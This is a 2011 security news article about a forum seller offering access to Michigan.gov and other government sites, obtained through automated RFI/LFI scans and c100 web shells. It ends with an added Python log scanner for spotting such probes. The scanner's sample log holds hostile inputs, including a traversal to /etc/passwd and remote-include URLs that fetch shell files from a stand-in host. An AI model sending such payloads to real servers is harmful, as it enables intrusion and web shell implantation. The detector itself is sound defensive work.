Michigan.gov and other government sites up for sale
by Steve Ragan - Jan 24 2011, 13:45

While most of Indiana was dealing with frozen pipes and single digit temperatures this weekend, the security world was buzzing about an active member of the Hack Forums community. His name is Srblche, and he’s selling backend access to Michigan’s main domain as well as other government sites.
The interest started when Imperva, a data security vendor, posted some redacted screenshots from Srblche’s domain to their blog. Using terms visible in the redacted images, a simple Google search points you to Srblche’s site. Given that many security reporters and researchers visit HackedForums.net, his offerings are nothing new or shocking.
The news surrounding Imperva’s blog post is still important. It just shouldn’t be taken as an emerging or unexpected problem. As mentioned by reporter and security analyst Brian Krebs, vulnerable domains are a persistent threat to security.
“Amid all of the media and public fascination with threats like Stuxnet and weighty terms such as ‘cyberwar,’ it’s easy to overlook the more humdrum and persistent security threats, such as Web site vulnerabilities,” Krebs wrote in his coverage of Imperva’s discovery.
In the image below, you’ll see the domains Srblche has up for sale and their corresponding prices. It’s interesting to see that Michigan.gov and Michigan’s eLibrary sell for different amounts based on the level of access offered.
Root access over SSH lets a buyer do far more with a server than SQL access alone, so domains sold with root command a higher fee. Military domains seem to command larger fees simply because of what they represent.

The level of access granted for the cracked domains depends on what Srblche’s scans are able to find. Each domain is cracked using automated tools; to give you an idea, Kaspersky has a blog post on some of the tools used to pull off such attacks.
Those scans often turn up Local File Inclusion or Remote File Inclusion flaws, which is why the access on offer differs from domain to domain. When an RFI/LFI scan succeeds, a web shell is uploaded; the image below is an example of the c100 shell running on a compromised server. A shell dropped this way executes with the privileges of the web server account rather than as root, so the root access advertised for some domains implies a further privilege escalation on the host.

Some of the users on Hack Forums call Srblche a ripper. Rippers are people who steal from others and claim the work as their own. Most of the tools that Srblche uses are not his own, and many of the detractors on the forums condemn him for selling access to freely available software.
Other posts report that Srblche is selling access to domains that he did not compromise himself. In truth, several of the domains listed on Srblche.com are freely available in various forum postings. There are also complaints from users who claim he scammed them.
The services offered by Srblche, seen below, are also called into question. Still, he is a highly ranked member in terms of reputation. This weekend, it was suggested that his press coverage will lead to jail time. Since news of his website broke, he has been silent on the forums. We can confirm, however, that he is not in any legal trouble at this time.

As mentioned, what Srblche is doing is nothing new. The takeaway lesson is that webmasters need to be vigilant in securing their domains, which means hardening both the application code and the server it runs on.
However, no configuration or codebase is perfect, so continuous monitoring and review are needed, along with an incident response plan. Testing your organization’s domains with scanners such as HP’s Scrawlr or Acunetix is also worth looking into.
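The RFI/LFI probes described above leave a recognisable trail in web server logs, and that trail is one of the cheapest forms of the monitoring just recommended. The following is an added example written for this piece, not code from the article, from Srblche or from any of the tools mentioned. It parses Apache combined-format access log lines, pulls every query parameter, and flags values that point at a remote URL (the RFI pattern, often with the trailing `?` that turns the rest of the include path into a query string for the attacker’s server) or at a traversal, null byte or absolute system path (the LFI pattern). The log lines and the addresses in them are constructed for the example; the parameter names and thresholds are assumptions, not a description of any real scanner.

```python
import re
from collections import Counter
from typing import Dict, Iterator, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed sample of Apache combined-format access log lines (not a real capture).
# The third and fourth requests carry the classic RFI payload: a remote URL, often
# ending in "?", pointing at a text file that contains a PHP shell such as c100.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jan/2011:13:45:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Jan/2011:13:45:02 -0500] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "libwww-perl/5.836"
203.0.113.9 - - [24/Jan/2011:13:45:03 -0500] "GET /index.php?page=http://198.51.100.7/c100.txt? HTTP/1.1" 200 9210 "-" "libwww-perl/5.836"
203.0.113.9 - - [24/Jan/2011:13:45:04 -0500] "GET /catalog.php?id=ftp://198.51.100.7/sh.txt%3F HTTP/1.1" 404 312 "-" "libwww-perl/5.836"
203.0.113.12 - - [24/Jan/2011:13:46:10 -0500] "GET /news.php?lang=en HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# RFI: the parameter value is itself a URL (any scheme, or a data: URI).
SCHEME_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:)", re.IGNORECASE)
# LFI: directory traversal, or an absolute path into a system directory.
TRAVERSAL_RE = re.compile(r"(?:\.\./|\.\.\\)")
ABS_PATH_RE = re.compile(r"^/(?:etc|proc|var|usr)/")


def decode_param(value: str) -> str:
    """URL-decode twice so a double-encoded %252e%252e%252f still reads as ../."""
    return unquote(unquote(value))


def classify_value(value: str) -> Optional[str]:
    """Return "RFI", "LFI" or None for a single query parameter value."""
    v = decode_param(value)
    if SCHEME_RE.match(v):
        return "RFI"
    # A %00 null byte was the classic trick for cutting off a ".php" suffix
    # that the application appended to the included filename.
    if TRAVERSAL_RE.search(v) or "\x00" in v or ABS_PATH_RE.match(v):
        return "LFI"
    return None


def query_params(request_path: str) -> Iterator[Tuple[str, str]]:
    """Yield (name, decoded value) for each parameter in the request's query string."""
    for pair in urlsplit(request_path).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote(name), decode_param(value)


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious parameter value, in log order."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would count these
        for name, value in query_params(m["path"]):
            kind = classify_value(value)
            if kind:
                # The HTTP status says nothing about whether the include actually
                # executed: a 200 may be the normal page, a 404 may still be a hit.
                findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                                 "kind": kind, "value": value, "status": m["status"],
                                 "ua": m["ua"]})
    return findings


def suspects(findings: List[Dict[str, str]], threshold: int = 2) -> Dict[str, int]:
    """Source IPs with at least `threshold` hits. One hit can be noise; a burst
    of different payloads from one address is the signature of an automated scanner.
    The threshold is an assumption for the example, not a tuned value."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['ip']} {f['kind']} {f['param']}={f['value']!r} ({f['status']})")
    print("scanner candidates:", suspects(hits))
```

On the sample, the script flags three parameter values from one address and reports that address as a scanner candidate, while the two ordinary requests pass. Treat the output as a trigger for log review and a check of the include handling in the flagged script, not as proof of compromise either way: a blocked request still shows up, and a successful upload looks much the same as a failed one until you look at what was written to the document root.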
Lastly, Srblche was interviewed recently by HP’s Raf Los. You can read the interview here.
